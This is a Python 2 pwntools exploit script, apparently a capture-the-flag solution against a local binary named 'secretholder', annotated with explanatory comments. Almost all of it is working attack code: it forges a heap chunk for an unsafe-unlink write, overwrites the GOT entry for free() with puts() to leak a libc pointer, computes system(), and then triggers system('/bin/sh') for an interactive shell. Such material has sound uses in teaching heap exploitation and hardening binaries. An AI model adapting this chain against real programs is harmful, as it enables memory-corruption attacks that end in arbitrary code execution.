  1. from pwn import *
  2.  
def keep(idx, data):
    """Drive menu option 1 ("keep") on the global process handle ``p``.

    Args:
        idx: value for the second prompt; ``str(idx)`` is what goes on the wire.
        data: payload sent after the prompt line via ``sendline`` (a newline is
            appended -- note that ``renew`` uses ``send`` with no newline).

    ``p`` is not a parameter: it is the module-level handle created under
    ``__main__`` below, so calling this before ``p`` exists raises NameError.
    """
    # Sync on the last menu entry before choosing an option.
    p.recvuntil('3. Renew secret')
    p.sendline('1')
    # Second prompt; presumably a size sub-menu ('3. Huge secret' is all the
    # script shows of it) -- confirm against the target's menu text.
    p.recvuntil('3. Huge secret')
    p.sendline(str(idx))
    # One line is read and discarded before the payload; presumably a prompt.
    p.recvline()
    p.sendline(data)
def wipe(idx):
    """Drive menu option 2 ("wipe") for entry ``idx`` on the global ``p``.

    Only the option and ``str(idx)`` are sent; no payload follows. From the
    name and its use below this presumably frees the entry in the target,
    but the menu text itself is not shown here.
    """
    p.recvuntil('3. Renew secret')
    p.sendline('2')
    p.recvuntil('3. Huge secret')
    p.sendline(str(idx))
def renew(idx, data):
    """Drive menu option 3 ("renew") for entry ``idx`` on the global ``p``.

    Unlike ``keep``, the payload goes out with ``p.send``, so no newline is
    appended -- callers pass raw binary (``p64(...)`` strings) through here,
    and a stray newline would corrupt the packed values.
    """
    p.recvuntil('3. Renew secret')
    p.sendline('3')
    p.recvuntil('3. Huge secret')
    p.sendline(str(idx))
    # One line is read and discarded before the payload; presumably a prompt.
    p.recvline()
    p.send(data)
if __name__ == '__main__':
    # Python 2 script (print statement below); pwntools str/bytes are used
    # interchangeably here, which does not hold on Python 3.
    p = process("./secretholder")
    # Echo every byte exchanged with the target -- noisy, but it makes a run
    # reproducible when reviewing what the script actually sent.
    context.log_level='debug'
    # Hard-coded absolute addresses: the script only works if the binary is
    # loaded at a fixed base (non-PIE) and its GOT is writable (no full
    # RELRO) -- those two build options are the mitigations that matter for
    # this chain.  The meanings below are inferred from use, not stated on
    # the page.
    addr = 0x6020a8        # presumably a writable global holding the target's entry pointers -- confirm
    free_got = 0x602018    # GOT slot for free(); written twice below
    puts_plt = 0x4006c0    # PLT stub for puts(); used as a temporary replacement for free()

    # Allocation / free sequence that arranges the target's heap before the
    # overwrite.  The order matters; the resulting layout depends on the
    # target's allocator and is not visible from this script alone.
    keep(1,'AAAA')
    keep(2,'AAAA')
    keep(3,'AAAA')

    wipe(1)
    wipe(2)
    wipe(3)

    keep(3,'AAAA')

    wipe(1)

    keep(1,'AAAA')
    keep(2,'AAAA')

    # Forged chunk header (prev_size 0, size 0x21) whose fd/bk point at
    # addr-0x18 / addr-0x10.  That is the shape of the classic "unsafe
    # unlink" layout, where fd->bk and bk->fd both resolve back to the
    # pointer stored at `addr`, so glibc's "corrupted double-linked list"
    # check passes and the unlink writes into `addr`.
    fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)

    # Bytes past the forged header that overwrite the following chunk
    # headers (size fields 0x20/0x90 and 0x90/0x91).  `renew` on entry 3
    # writing this far is the memory-safety bug the whole chain rests on.
    junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)

    renew(3,fake_chunk + junk)
    # Unexplained pause; presumably gives the target time to consume the
    # write before the next menu round-trip.
    sleep(0.2)
    # Presumably the free of entry 2 is what triggers the unlink on the
    # forged chunk above.
    wipe(2)

    # After the unlink, writes through entry 3 presumably land on the
    # target's own pointer table; this aims one entry at free's GOT slot,
    # offset by -0x10 so the two leading zero qwords of the next write line
    # up on the slot itself.
    renew(3, p64(0)*3 + p64(free_got - 0x10))

    # First GOT overwrite: free() now resolves to puts(), so every wipe()
    # prints the freed buffer instead of freeing it.
    renew(3, p64(0)*2 + p64(puts_plt))

    # 16-byte marker in entry 1; freeing it (free -> puts) prints the
    # marker followed by whatever bytes follow it in memory.
    renew(1,'/bin/sh;' + "A"*8)

    wipe(1)

    p.recvuntil("/bin/sh;" + "A"*8)
    # The 6 bytes printed after the marker are treated as a pointer leak
    # (a canonical x86-64 user pointer fits in 6 bytes).  `[0:]` is a no-op slice.
    leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
    print "[+] Leak : 0x%x" % leak
    # Version-specific library offsets: these tie the script to one exact
    # libc build.  The constants are not explained on the page and cannot
    # be checked here.
    system = leak - 0x3be7b8 + 0x45390 - 0x63c0

    # Second GOT overwrite: free() -> system().
    renew(3, p64(0)*2 + p64(system))

    # free(entry 1) is now system("/bin/sh;AAAAAAAA"); the ';' ends the
    # command, so the shell ignores the padding after it.
    wipe(1)

    p.interactive()